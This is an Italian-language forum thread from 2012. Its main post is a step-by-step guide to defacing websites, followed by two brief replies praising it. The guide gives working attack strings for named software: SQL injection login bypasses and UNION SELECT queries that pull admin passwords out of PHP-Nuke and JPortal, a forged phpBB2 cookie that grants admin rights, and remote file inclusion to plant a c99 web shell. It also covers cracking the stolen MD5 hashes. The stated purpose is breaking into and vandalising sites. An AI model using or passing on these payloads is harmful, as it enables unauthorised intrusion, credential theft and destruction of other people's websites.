Own3D Admin
Messaggi : 14 Data d'iscrizione : 01.08.12 Età : 28 Località : Piemonte
| Titolo: Significato e guida Defacing Gio Ago 02, 2012 1:58 pm | |
| termine Defacing vuol dire hackerare un sito, cioè cambiare l’Home Page o più pagine infatti bisogna distinguere due tipi di Deface:
* Deface: Deface normale con il solo cambio di index (Pagina iniziale) * Mass Deface: Cancellazione o Modificazione di tutti i file dell’FTP
Ci sono varie tecniche per il Defacing, noi ne esamineremo 8: Remote File Inclusion, SQL Injection, ASP Injection, XSS (Cross Site Scripting), Remote Command Injection, Cookie Manipulation, Google Hacking e gli Exploit.
In questa guida parleremo di questi attacchi per 10 tipi di Siti:
1. PHP Site 2. PHP-Nuke Site 3. ASP Site 4. HTML Site 5. PHPBB 6. PHPBB2 Forum 7. JPortal 8. GuestBook 9. Invision PowerBoard 10. Powered by FrontPage
Ma ecco in dettaglio le varie mini-guide:
* PHP Site
Per defacciare un sito in PHP potete usare un Remote File Inclusion e siete dentro. Per fare ciò basta scrivere: [Solo gli amministratori hanno il permesso di visualizzare questo link] (tutto attaccato). Dove al posto di [Solo gli amministratori hanno il permesso di visualizzare questo link] ci mettete il vostro sito naturalmente con la c99 (Shell) dentro, che va messa usando l’[Solo gli amministratori hanno il permesso di visualizzare questo link]
Oppure si può usare la tecnica SQL Injection, scrivendo nel login:
UserName: ‘or’’=’ Password: ‘or’’=’
Se invece il sito è patchato provvediamo con dei Bug. Proviamo scrivendo nel sito vittima un percorso ke potrebbe portarci all’intera lista di password: [Solo gli amministratori hanno il permesso di visualizzare questo link]
Se vi vedete spuntare qualcosa allora avrete d’avanti la lista di password in MD5 (un sistema di crittografia per le pass in rete). Per decifrarle salvate tutto in un txt e chiudete la connessione. Andate su un sito per pass MD5 (vedere in fondo alla guida) o usate un programma come “Cain & Abel” (un potentissimo BruteForcer per pass in md5). Se la stringa non ci porta da nessuna parte scriviamo: [Solo gli amministratori hanno il permesso di visualizzare questo link] /passwd (tutto attaccato) Se non trovate niente pure questa volta si vede che l’Admin è un pò furbo quindi non vi resta che provare l’ultima alternativa. Andate nel percorso [Solo gli amministratori hanno il permesso di visualizzare questo link] /passwd (tutto attaccato) Dove al posto di /mlog.html? è stato scritto /mylog.html?. Se non funziona neanche questo lasciate perdere oppure smanettate un pò .
* PHP-Nuke Site
Ora vi illustro 3 exploit moderni e funzionanti;
Exploit – Modulo Cerca
Andate nel modulo Cerca, ossia la barra dove si mette la parola che vogliamo cercare nel sito e scriviamo: p0hh0nsee%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* premiamo invio e siamo in Root come amministratori.
Exploit – Top10
Questo modulo non è presente in tutti i siti in PHP-Nuke, anzi in pochi ormai. Ma con un pò di fortuna lo potremmo trovare e al quel punto basta andare in un percorso del sito e iniettare l’exploit: [Solo gli amministratori hanno il permesso di visualizzare questo link] %20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd ,1,1%20FROM%20nuke_authors (tutto attaccato). Se funziona ci collegheremo come Admin.
Exploit – Sql Injection
Scriviamo nella barra degli indirizzi la stringa: [Solo gli amministratori hanno il permesso di visualizzare questo link] Avremo come risultato una scritta che dice “Selection from the databse failed!” Se avremo esattamente questo risultato siamo dentro.
Con la stringa [Solo gli amministratori hanno il permesso di visualizzare questo link] si può creare un nuovo User con privilegi amministrativi con il Nick badangel e Pass topsecret e possiamo fare quello che vogliamo. Se invece volete Nick e Pass tutto vostro allora basta agire sui valori add_aid per il Nick e add_pwd per la Pass
* ASP Site
In questo caso possiamo usare la tecnica ASP Injection. Ecco varie stringhe da inserire nel Login Utente per avere i permessi Root
Diventare Utenti senza Neanche registrarsi:
UserName: apostrofo Password: [nessuna password, lasciate vuoto]
Accedere da Admin:
UserName: ‘ union select Password,1,1,1 from members where UserID = ‘admin’— Password: [nessuna password]
Diventare automaticamente amministratori
UserName: admin’ – Password: [nessuna pass]
Primo utente nella lista
UserName: ‘ or 0=0 –sp_password Password: [nessuna pass]
* HTML Site
L’HTML sappiate che, a differenza dei siti in PHP e ASP (che sono linguaggi dinamici), è un linguaggio statico (si chiama anche linguaggio di Markup) o quindi non può essere Hackerato o quasi. L’unico modo per hackerare un sito in html sarebbe quello di trovare qualche Bug nell’FTP o nel Finger. Oltre a questi attacchi possono essere vulnerabili a XSS.
* PHPBB & PHPBB2 Forum
Esistono molti exploit per i forum in PHPBB & PHPBB2, ma sono exploit da compilare in C e da includere nel sito. Quindi per defacciare utilizzando degli exploit bisogna sapere il Linguaggio C. Esiste comunque un bel exploit che ci permette di diventare Root in un forum, l’unica pecca è che dobbiamo usare Firefox. La tecnica che andremo ad utilizzare è Cookie Manipulation. Innanzitutto cancelliamo tutti i Cookie. Entriamo nel sito in PHPBB2 e usciamo. Adesso utliziamo l’Add-On Extended Cookie Manager 0.8.1 o View Cookies CS 1.0.7 (che ci permettono di modificare i cookie) e apriamo il cookie ke ci ha mandato il forum (l’unico che c’è perchè li abbiamo cancellati tutti prima).
Se avremo una scritta del genere 127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%*7B%*7D. Sostituiamola con questa: 127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%*7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs %3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%*7D (tutto attaccato). Salvate tutto e torniamo al forum. Adesso saremo admin. PS: Smanettando un pò con i cookie potete accedere in Root in molti siti.
* JPortal
Per hackerare un sito in JPortal basta Injettare all’URL un codice (SQL Injection) e poi fare il Login:
[Solo gli amministratori hanno il permesso di visualizzare questo link] 0%20UNION%20SELECT%20id,id,nick,pass,id,id,id,id,i d%20 from%20admins%20LIMIT%201 (tutto attaccato)
FONTE:Mia e postata fa me in altri forum Ciao | |
|
jakass Admin
Messaggi : 26 Data d'iscrizione : 25.07.12
| Titolo: Re: Significato e guida Defacing Gio Ago 02, 2012 7:28 pm | |
| Bravo Own3D,Bella Guida , continua così e potrsti andae avanti di grado | |
|
Own3D Admin
Messaggi : 14 Data d'iscrizione : 01.08.12 Età : 28 Località : Piemonte
| Titolo: Re: Significato e guida Defacing Gio Ago 02, 2012 7:29 pm | |
| Grazie | |
|
Contenuto sponsorizzato
| Titolo: Re: Significato e guida Defacing | |
| |
|